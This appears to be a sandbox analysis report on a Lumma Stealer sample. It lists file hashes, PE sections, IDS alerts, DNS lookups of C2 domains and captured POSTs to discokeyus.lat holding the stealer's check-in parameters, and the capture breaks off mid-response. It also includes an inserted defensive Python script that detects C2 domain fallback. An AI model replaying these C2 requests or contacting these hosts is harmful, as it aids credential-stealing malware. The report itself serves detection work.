File size: 1'819'648 bytes
MD5: 157a5af38553ccb117f6d278b2b046f0
SHA1: 9793935e64772bb6fa3665d090fb7e9d448ad438
SHA256: a0d75064673f21a234d5556762f77ee96daad893e015824d7526cb965df0dd44
SHA512: 0798f89180e91f76c357683f05cfe1103db048fdb4428f25417e141530275bb753aaf96cc5d16b5d9497878434cf05047b8e515a5a155d57e3e3b0005b7b66b6
SSDEEP: 49152:IFUK+tknnOhw3POob/QLBESTaMdSUAygf8pBb/6l50:IFUHtkDOobYLvaKSUAipBb/0
TLSH: 748533C30D6705FBC4DA5A311A4B652C5E51096C1B7D87F9EC9F92FA24933A23B3286C
File Content Preview: MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....<_g............................. H...........@..........................PH.....Hv....@.................................T0..h..
Icon Hash: 00928e8e8686b000
Entrypoint: 0x882000
Entrypoint Section: .taggant
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp: 0x675F3CD1 [Sun Dec 15 20:32:17 2024 UTC]
TLS Callbacks: (none)
CLR (.Net) Version: (none)
OS Version Major: 6
OS Version Minor: 0
File Version Major: 6
File Version Minor: 0
Subsystem Version Major: 6
Subsystem Version Minor: 0
Import Hash: 2eabe9054cad5152567f0699947a2c5b
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x53054 | 0x68 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x52000 | 0x2b0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x531f8 | 0x8 | .idata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
 | 0x1000 | 0x51000 | 0x24800 | d8d6b63e4d892d13f700cd3b11d338ec | False | 0.9972642872431506 | data | 7.97194323302097 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x52000 | 0x2b0 | 0x400 | b1e85b1cd09caefc2d43268be72ef161 | False | 0.3603515625 | data | 5.183452444303608 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x53000 | 0x1000 | 0x200 | 19a29171433eeef17e42fd663f137134 | False | 0.14453125 | data | 0.9996515881509258 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
 | 0x54000 | 0x299000 | 0x200 | cb4265b19cc044d66279b081181b750a | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
zajbtexj | 0x2ed000 | 0x194000 | 0x193c00 | d2d1b5d24f2a15203f0e38180ebbee82 | False | 0.9940281540247679 | data | 7.953476453200085 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
kwcryctq | 0x481000 | 0x1000 | 0x600 | 35c9b2c6a25aa60f16b83c6a0311a221 | False | 0.5768229166666666 | data | 4.978904810718496 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0x482000 | 0x3000 | 0x2200 | 5fb420a62c640a7bf7217e7d75e4b220 | False | 0.05801930147058824 | DOS executable (COM) | 0.6518609947377214 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_MANIFEST | 0x52058 | 0x256 | ASCII text, with CRLF line terminators | | | 0.5100334448160535
DLL | Import
kernel32.dll | lstrcpy
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-20T17:05:35.140726+0100 | 2058378 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sweepyribs .lat) | 1 | 192.168.2.7 | 50706 | 1.1.1.1 | 53 | UDP
2024-12-20T17:05:35.285027+0100 | 2058364 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat) | 1 | 192.168.2.7 | 59759 | 1.1.1.1 | 53 | UDP
2024-12-20T17:05:35.428603+0100 | 2058360 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (discokeyus .lat) | 1 | 192.168.2.7 | 63618 | 1.1.1.1 | 53 | UDP
2024-12-20T17:05:36.797002+0100 | 2058361 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) | 1 | 192.168.2.7 | 49704 | 172.67.197.170 | 443 | TCP
2024-12-20T17:05:36.797002+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49704 | 172.67.197.170 | 443 | TCP
2024-12-20T17:05:40.756321+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.7 | 49704 | 172.67.197.170 | 443 | TCP
2024-12-20T17:05:40.756321+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.7 | 49704 | 172.67.197.170 | 443 | TCP
2024-12-20T17:05:41.982787+0100 | 2058361 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) | 1 | 192.168.2.7 | 49705 | 172.67.197.170 | 443 | TCP
2024-12-20T17:05:41.982787+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49705 | 172.67.197.170 | 443 | TCP
2024-12-20T17:05:42.845349+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.7 | 49705 | 172.67.197.170 | 443 | TCP
2024-12-20T17:05:42.845349+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.7 | 49705 | 172.67.197.170 | 443 | TCP
2024-12-20T17:05:44.690217+0100 | 2058361 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) | 1 | 192.168.2.7 | 49706 | 172.67.197.170 | 443 | TCP
2024-12-20T17:05:44.690217+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49706 | 172.67.197.170 | 443 | TCP
2024-12-20T17:05:47.219346+0100 | 2058361 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) | 1 | 192.168.2.7 | 49707 | 172.67.197.170 | 443 | TCP
2024-12-20T17:05:47.219346+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49707 | 172.67.197.170 | 443 | TCP
2024-12-20T17:05:48.188607+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.7 | 49707 | 172.67.197.170 | 443 | TCP
2024-12-20T17:05:49.655708+0100 | 2058361 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) | 1 | 192.168.2.7 | 49709 | 172.67.197.170 | 443 | TCP
2024-12-20T17:05:49.655708+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49709 | 172.67.197.170 | 443 | TCP
2024-12-20T17:05:53.248920+0100 | 2058361 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) | 1 | 192.168.2.7 | 49712 | 172.67.197.170 | 443 | TCP
2024-12-20T17:05:53.248920+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49712 | 172.67.197.170 | 443 | TCP
2024-12-20T17:05:56.652841+0100 | 2058361 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) | 1 | 192.168.2.7 | 49713 | 172.67.197.170 | 443 | TCP
2024-12-20T17:05:56.652841+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49713 | 172.67.197.170 | 443 | TCP
2024-12-20T17:06:03.121052+0100 | 2058361 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) | 1 | 192.168.2.7 | 49714 | 172.67.197.170 | 443 | TCP
2024-12-20T17:06:03.121052+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49714 | 172.67.197.170 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                  Dec 20, 2024 17:05:56.658469915 CET49713443192.168.2.7172.67.197.170
                                                                                                                                  Dec 20, 2024 17:05:56.699353933 CET44349713172.67.197.170192.168.2.7
                                                                                                                                  Dec 20, 2024 17:05:56.699569941 CET49713443192.168.2.7172.67.197.170
                                                                                                                                  Dec 20, 2024 17:05:56.699631929 CET49713443192.168.2.7172.67.197.170
                                                                                                                                  Dec 20, 2024 17:05:56.699672937 CET49713443192.168.2.7172.67.197.170
                                                                                                                                  Dec 20, 2024 17:05:56.743336916 CET44349713172.67.197.170192.168.2.7
                                                                                                                                  Dec 20, 2024 17:05:56.743485928 CET49713443192.168.2.7172.67.197.170
                                                                                                                                  Dec 20, 2024 17:05:56.787334919 CET44349713172.67.197.170192.168.2.7
                                                                                                                                  Dec 20, 2024 17:06:02.560805082 CET44349713172.67.197.170192.168.2.7
                                                                                                                                  Dec 20, 2024 17:06:02.560920000 CET44349713172.67.197.170192.168.2.7
                                                                                                                                  Dec 20, 2024 17:06:02.561032057 CET49713443192.168.2.7172.67.197.170
                                                                                                                                  Dec 20, 2024 17:06:02.561117887 CET49713443192.168.2.7172.67.197.170
                                                                                                                                  Dec 20, 2024 17:06:02.561136007 CET44349713172.67.197.170192.168.2.7
                                                                                                                                  Dec 20, 2024 17:06:02.586174011 CET49714443192.168.2.7172.67.197.170
                                                                                                                                  Dec 20, 2024 17:06:02.586225033 CET44349714172.67.197.170192.168.2.7
                                                                                                                                  Dec 20, 2024 17:06:02.586318970 CET49714443192.168.2.7172.67.197.170
                                                                                                                                  Dec 20, 2024 17:06:02.586829901 CET49714443192.168.2.7172.67.197.170
                                                                                                                                  Dec 20, 2024 17:06:02.586852074 CET44349714172.67.197.170192.168.2.7
                                                                                                                                  Dec 20, 2024 17:06:03.121052027 CET49714443192.168.2.7172.67.197.170
Timestamp                            Source Port  Dest Port  Source IP    Dest IP
Dec 20, 2024 17:05:35.140726089 CET  50706        53         192.168.2.7  1.1.1.1
Dec 20, 2024 17:05:35.278609037 CET  53           50706      1.1.1.1      192.168.2.7
Dec 20, 2024 17:05:35.285027027 CET  59759        53         192.168.2.7  1.1.1.1
Dec 20, 2024 17:05:35.423559904 CET  53           59759      1.1.1.1      192.168.2.7
Dec 20, 2024 17:05:35.428602934 CET  63618        53         192.168.2.7  1.1.1.1
Dec 20, 2024 17:05:35.566508055 CET  53           63618      1.1.1.1      192.168.2.7
Timestamp                            Source IP    Dest IP  Trans ID  OP Code             Name            Type            Class        DNS over HTTPS
Dec 20, 2024 17:05:35.140726089 CET  192.168.2.7  1.1.1.1  0x7d9c    Standard query (0)  sweepyribs.lat  A (IP address)  IN (0x0001)  false
Dec 20, 2024 17:05:35.285027027 CET  192.168.2.7  1.1.1.1  0xbb9c    Standard query (0)  grannyejh.lat   A (IP address)  IN (0x0001)  false
Dec 20, 2024 17:05:35.428602934 CET  192.168.2.7  1.1.1.1  0xe04f    Standard query (0)  discokeyus.lat  A (IP address)  IN (0x0001)  false
Timestamp                            Source IP  Dest IP      Trans ID  Reply Code      Name            CName  Address         Type            Class        DNS over HTTPS
Dec 20, 2024 17:05:35.278609037 CET  1.1.1.1    192.168.2.7  0x7d9c    Name error (3)  sweepyribs.lat  none   none            A (IP address)  IN (0x0001)  false
Dec 20, 2024 17:05:35.423559904 CET  1.1.1.1    192.168.2.7  0xbb9c    Name error (3)  grannyejh.lat   none   none            A (IP address)  IN (0x0001)  false
Dec 20, 2024 17:05:35.566508055 CET  1.1.1.1    192.168.2.7  0xe04f    No error (0)    discokeyus.lat         172.67.197.170  A (IP address)  IN (0x0001)  false
Dec 20, 2024 17:05:35.566508055 CET  1.1.1.1    192.168.2.7  0xe04f    No error (0)    discokeyus.lat         104.21.21.99    A (IP address)  IN (0x0001)  false
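Added example, not part of this report: the DNS rows above show the sample walking its embedded C2 list, two NXDOMAIN answers (sweepyribs.lat, grannyejh.lat) inside 0.3 s followed by a name that resolves (discokeyus.lat, two Cloudflare-fronted A records). The script below joins queries to answers on transaction ID and flags exactly that run-of-failures-then-success pattern. The event list is constructed from the rows above with timestamps trimmed to microseconds; the threshold and window are assumptions.

```python
"""Added example (not from the Joe Sandbox report): detect the C2 domain
fallback pattern in DNS logs, i.e. a burst of NXDOMAIN lookups followed by
one that resolves, as seen in the DNS queries/answers above."""
from datetime import datetime, timedelta

# Constructed from the report's DNS rows: (timestamp, kind, trans ID, name, rcode, address).
# CET timestamps are cut to microseconds because strptime's %f takes at most 6 digits.
DNS_EVENTS = [
    ("2024-12-20 17:05:35.140726", "query",  0x7d9c, "sweepyribs.lat", None, None),
    ("2024-12-20 17:05:35.278609", "answer", 0x7d9c, "sweepyribs.lat", "NXDOMAIN", None),
    ("2024-12-20 17:05:35.285027", "query",  0xbb9c, "grannyejh.lat",  None, None),
    ("2024-12-20 17:05:35.423559", "answer", 0xbb9c, "grannyejh.lat",  "NXDOMAIN", None),
    ("2024-12-20 17:05:35.428602", "query",  0xe04f, "discokeyus.lat", None, None),
    ("2024-12-20 17:05:35.566508", "answer", 0xe04f, "discokeyus.lat", "NOERROR", "172.67.197.170"),
    ("2024-12-20 17:05:35.566508", "answer", 0xe04f, "discokeyus.lat", "NOERROR", "104.21.21.99"),
]


def _ts(text):
    return datetime.strptime(text, "%Y-%m-%d %H:%M:%S.%f")


def pair_lookups(events):
    """Join query and answer rows into one record per lookup, ordered by query time.

    Keyed on (trans ID, name) because 16-bit transaction IDs repeat in longer captures.
    Multiple answer rows (one per A record, as above) collapse into one address list."""
    lookups = {}
    for ts, kind, txid, name, rcode, addr in events:
        rec = lookups.setdefault((txid, name), {"t": None, "name": name, "rcode": None, "addrs": []})
        if kind == "query":
            rec["t"] = _ts(ts)
        else:
            rec["t"] = rec["t"] or _ts(ts)  # answer without a captured query keeps the answer time
            rec["rcode"] = rcode
            if addr:
                rec["addrs"].append(addr)
    return sorted(lookups.values(), key=lambda r: r["t"])


def find_fallback_sequences(events, min_failures=2, window=timedelta(seconds=5)):
    """Report every resolving lookup that was preceded by >= min_failures consecutive
    NXDOMAIN lookups, all issued within `window` of the successful one.
    Threshold and window are assumed values, not taken from the report."""
    hits, failed = [], []
    for rec in pair_lookups(events):
        if rec["rcode"] == "NXDOMAIN":
            failed.append(rec)
            continue
        if rec["rcode"] == "NOERROR":
            recent = [f for f in failed if rec["t"] - f["t"] <= window]
            if len(recent) >= min_failures:
                hits.append({
                    "failed": [f["name"] for f in recent],
                    "resolved": rec["name"],
                    "addresses": rec["addrs"],
                    "span_seconds": (rec["t"] - recent[0]["t"]).total_seconds(),
                })
        failed = []  # anything other than NXDOMAIN ends the current run
    return hits


if __name__ == "__main__":
    for hit in find_fallback_sequences(DNS_EVENTS):
        print(hit)
```

The sample's own DNS list is the strongest signal here: a resolver log that shows a process burning through several never-registered-looking names and then settling on one, all inside a second, is rarely benign, and the successful name is the one to pivot on in proxy and TLS logs.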
                                                                                                                                  • discokeyus.lat
Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
0           192.168.2.7  49704        172.67.197.170  443               4208  C:\Users\user\Desktop\zhQFKte2vX.exe

Timestamp                Bytes transferred  Direction  Data (on the indented lines that follow)
2024-12-20 16:05:37 UTC  261                OUT
  POST /api HTTP/1.1
  Connection: Keep-Alive
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
  Content-Length: 8
  Host: discokeyus.lat
2024-12-20 16:05:37 UTC  8                  OUT
  Data Raw: 61 63 74 3d 6c 69 66 65
  Data Ascii: act=life
2024-12-20 16:05:40 UTC  1130               IN
  HTTP/1.1 200 OK
  Date: Fri, 20 Dec 2024 16:05:40 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: close
  Set-Cookie: PHPSESSID=llcsarn1i53tueh7matk14pigi; expires=Tue, 15 Apr 2025 09:52:19 GMT; Max-Age=9999999; path=/
  Expires: Thu, 19 Nov 1981 08:52:00 GMT
  Cache-Control: no-store, no-cache, must-revalidate
  Pragma: no-cache
  X-Frame-Options: DENY
  X-Content-Type-Options: nosniff
  X-XSS-Protection: 1; mode=block
  cf-cache-status: DYNAMIC
  vary: accept-encoding
  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QdvbyxR5Hb44ikUfHkZVb8wNmhjVUcqhM%2FicS0TSLZc%2FIfmfBvcAkhxrNrJYZOeJIz7%2BZH1s5AUutgC79BsSHVtfWd5nphxli3qI3BTu6zjI1vOoa%2FSH3o3CBG%2BBPzLsUg%3D%3D"}],"group":"cf-nel","max_age":604800}
  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
  Server: cloudflare
  CF-RAY: 8f50dffc2db76a52-EWR
  alt-svc: h3=":443"; ma=86400
  server-timing: cfL4;desc="?proto=TCP&rtt=1748&min_rtt=1735&rtt_var=678&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2832&recv_bytes=905&delivery_rate=1582655&cwnd=216&unsent_bytes=0&cid=8a7cb80b558bd2c6&ts=3973&x=0"
2024-12-20 16:05:40 UTC  7                  IN
  Data Raw: 32 0d 0a 6f 6b 0d 0a
  Data Ascii: 2ok
2024-12-20 16:05:40 UTC  5                  IN
  Data Raw: 30 0d 0a 0d 0a
  Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
1           192.168.2.7  49705        172.67.197.170  443               4208  C:\Users\user\Desktop\zhQFKte2vX.exe

Timestamp                Bytes transferred  Direction  Data (on the indented lines that follow)
2024-12-20 16:05:41 UTC  262                OUT
  POST /api HTTP/1.1
  Connection: Keep-Alive
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
  Content-Length: 47
  Host: discokeyus.lat
2024-12-20 16:05:41 UTC  47                 OUT
  Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 26 6a 3d
  Data Ascii: act=recive_message&ver=4.0&lid=PsFKDg--pablo&j=
2024-12-20 16:05:42 UTC  1129               IN
  HTTP/1.1 200 OK
  Date: Fri, 20 Dec 2024 16:05:42 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: close
  Set-Cookie: PHPSESSID=e6pe79j6imcorlg4j8luttpkr6; expires=Tue, 15 Apr 2025 09:52:21 GMT; Max-Age=9999999; path=/
  Expires: Thu, 19 Nov 1981 08:52:00 GMT
  Cache-Control: no-store, no-cache, must-revalidate
  Pragma: no-cache
  X-Frame-Options: DENY
  X-Content-Type-Options: nosniff
  X-XSS-Protection: 1; mode=block
  cf-cache-status: DYNAMIC
  vary: accept-encoding
  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LEX%2BtbB5WXcqklNJzDjvk7Gpqp8A57juF%2BYjw8o0tGm3aqPdHApGU57%2BtjnrKQgBKzWW5EujXNYXF6vSqw7l9kzt99%2Fb%2B0GTORecLrwICLhh3J1dpMmc120Cnuk5nVf1Mw%3D%3D"}],"group":"cf-nel","max_age":604800}
  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
  Server: cloudflare
  CF-RAY: 8f50e01b2f4142e5-EWR
  alt-svc: h3=":443"; ma=86400
  server-timing: cfL4;desc="?proto=TCP&rtt=1755&min_rtt=1752&rtt_var=664&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2833&recv_bytes=945&delivery_rate=1640449&cwnd=221&unsent_bytes=0&cid=d20be10e66163ae2&ts=868&x=0"
2024-12-20 16:05:42 UTC  240                IN
  Data Raw: 34 39 31 63 0d 0a 37 44 52 4d 34 56 50 37 79 53 73 72 66 34 4f 59 62 6a 70 78 49 71 77 6d 77 6d 7a 66 45 58 30 42 52 44 6f 64 55 4e 59 64 45 51 6d 58 46 6a 72 44 61 63 2f 6c 43 56 67 61 6f 61 49 61 53 41 52 48 67 41 53 6a 43 50 30 72 47 32 41 6f 53 58 68 38 39 47 74 38 4b 39 5a 53 4c 59 30 67 6e 75 55 4a 54 67 65 68 6f 6a 56 42 55 30 66 43 42 50 68 4f 75 6e 73 66 59 43 68 59 66 44 75 35 62 58 31 71 68 46 67 72 69 54 61 59 72 55 70 48 45 75 62 39 43 31 73 62 54 4d 56 4c 71 67 48 39 50 56 39 6b 50 68 67 6e 63 70 74 34 5a 57 69 68 56 54 2b 4b 63 59 62 6c 55 41 6b 61 37 62 70 55 47 42 42 48 7a 6b 71 6b 43 4c 52 35 46 57 6b 67 57 58 6b 36 70 6e 52 33 59 59 52 57 4b 49 67 38 6b 62 6c 48 54 52 58 74 2b 77 46 62 55 77
  Data Ascii: 491c7DRM4VP7ySsrf4OYbjpxIqwmwmzfEX0BRDodUNYdEQmXFjrDac/lCVgaoaIaSARHgASjCP0rG2AoSXh89Gt8K9ZSLY0gnuUJTgehojVBU0fCBPhOunsfYChYfDu5bX1qhFgriTaYrUpHEub9C1sbTMVLqgH9PV9kPhgncpt4ZWihVT+KcYblUAka7bpUGBBHzkqkCLR5FWkgWXk6pnR3YYRWKIg8kblHTRXt+wFbUw
2024-12-20 16:05:42 UTC  1369               IN
  Data Raw: 36 4f 51 37 68 4f 35 54 4e 4d 55 53 56 4a 62 69 65 35 62 33 55 72 6b 52 67 33 77 7a 61 56 36 78 45 4a 46 65 33 30 43 56 73 63 52 38 39 45 73 67 47 39 63 42 64 72 49 6c 4a 77 50 62 74 78 65 57 79 47 58 79 6d 4d 4e 70 47 74 52 6b 70 64 72 37 6f 4c 51 46 4d 59 6a 6d 53 77 44 62 35 6e 45 6e 4a 6d 52 7a 45 72 39 48 68 2f 4b 39 59 57 4b 49 30 77 6c 4b 74 62 51 52 62 71 2f 78 35 54 47 6b 33 44 52 4b 30 45 73 6e 41 66 5a 43 78 53 63 44 69 77 63 6e 35 74 6a 6c 5a 75 7a 58 47 65 73 77 6b 52 58 63 4c 2f 48 46 38 66 56 6f 78 2b 34 42 48 7a 61 6c 39 6b 4b 68 67 6e 63 72 78 36 63 47 69 46 57 53 32 4c 4f 6f 75 72 57 30 38 51 35 4f 67 4b 58 52 31 4b 7a 56 61 71 41 4c 74 77 46 6d 67 76 58 58 67 32 39 44 45 7a 62 4a 59 57 64 73 4d 51 6c 4b 42 46 51 77 72 68 75 68 4d 57 43
  Data Ascii: 6OQ7hO5TNMUSVJbie5b3UrkRg3wzaV6xEJFe30CVscR89EsgG9cBdrIlJwPbtxeWyGXymMNpGtRkpdr7oLQFMYjmSwDb5nEnJmRzEr9Hh/K9YWKI0wlKtbQRbq/x5TGk3DRK0EsnAfZCxScDiwcn5tjlZuzXGeswkRXcL/HF8fVox+4BHzal9kKhgncrx6cGiFWS2LOourW08Q5OgKXR1KzVaqALtwFmgvXXg29DEzbJYWdsMQlKBFQwrhuhMWC
2024-12-20 16:05:42 UTC  1369               IN
  Data Raw: 73 42 4c 74 38 45 6d 39 6d 46 6a 38 31 72 44 38 72 4b 36 52 56 4f 6f 41 37 32 35 35 4b 52 78 50 6d 37 45 78 48 58 56 6d 4f 51 36 78 4f 35 54 4d 53 59 69 35 65 62 54 32 35 66 48 31 6c 67 56 4d 68 69 7a 47 5a 70 6b 78 4e 46 75 72 35 41 56 77 42 53 73 35 4d 70 51 2b 33 65 56 38 74 5a 6c 39 6e 63 75 77 2f 51 6e 79 46 46 42 75 41 50 35 65 73 58 77 6b 43 72 2b 4e 4d 58 78 38 41 6c 67 53 74 42 72 68 32 45 47 49 73 56 6e 6f 34 75 48 64 39 61 4a 78 5a 4b 6f 4d 39 6b 61 46 45 52 78 6e 70 38 77 64 54 46 55 44 50 54 75 42 41 2f 58 51 48 49 33 34 59 53 7a 57 34 63 6e 77 70 75 31 55 67 6a 54 61 50 36 31 59 48 42 4b 48 39 41 42 68 4c 41 4d 4a 4e 6f 41 57 33 64 78 39 6b 4b 31 31 38 4e 62 64 79 64 47 47 41 55 53 71 50 4f 4a 53 74 53 55 34 5a 35 4f 67 4a 55 52 39 4d 6a 67
  Data Ascii: sBLt8Em9mFj81rD8rK6RVOoA7255KRxPm7ExHXVmOQ6xO5TMSYi5ebT25fH1lgVMhizGZpkxNFur5AVwBSs5MpQ+3eV8tZl9ncuw/QnyFFBuAP5esXwkCr+NMXx8AlgStBrh2EGIsVno4uHd9aJxZKoM9kaFERxnp8wdTFUDPTuBA/XQHI34YSzW4cnwpu1UgjTaP61YHBKH9ABhLAMJNoAW3dx9kK118NbdydGGAUSqPOJStSU4Z5OgJUR9Mjg
2024-12-20 16:05:42 UTC  1369               IN
  Data Raw: 62 46 46 36 5a 6c 39 7a 63 75 77 2f 65 6d 4b 63 57 43 43 4b 50 4a 2b 6a 54 6b 63 51 36 76 77 48 58 78 52 47 77 30 79 74 43 37 35 79 47 32 6b 30 57 33 51 34 75 58 55 7a 4a 63 35 52 4e 73 4e 70 32 59 78 46 59 41 33 36 36 42 6f 59 44 41 37 58 42 4b 63 43 2f 53 74 66 59 43 6c 52 63 44 71 38 63 48 78 76 67 46 41 6f 6a 6a 53 57 6f 56 74 42 45 2b 7a 78 41 31 4d 42 51 4d 4e 41 72 41 71 31 65 42 55 6a 61 42 68 34 4b 76 51 6e 4d 31 36 44 57 53 36 41 4a 39 6d 30 42 31 42 64 35 76 5a 4d 41 46 4e 4d 77 45 53 76 41 72 46 34 46 32 49 71 56 6e 67 33 76 58 64 37 65 59 39 53 4a 6f 49 2f 6c 71 70 4e 54 42 6a 6c 2f 51 68 65 48 41 43 41 42 4b 63 57 2f 53 74 66 54 41 46 74 50 52 4f 4f 50 32 77 6c 6c 78 59 70 6a 33 48 42 36 30 56 4b 45 65 6e 31 43 6c 45 66 53 73 64 50 72 41 57
  Data Ascii: bFF6Zl9zcuw/emKcWCCKPJ+jTkcQ6vwHXxRGw0ytC75yG2k0W3Q4uXUzJc5RNsNp2YxFYA366BoYDA7XBKcC/StfYClRcDq8cHxvgFAojjSWoVtBE+zxA1MBQMNArAq1eBUjaBh4KvQnM16DWS6AJ9m0B1Bd5vZMAFNMwESvArF4F2IqVng3vXd7eY9SJoI/lqpNTBjl/QheHACABKcW/StfTAFtPROOP2wllxYpj3HB60VKEen1ClEfSsdPrAW
2024-12-20 16:05:42 UTC  1369               IN
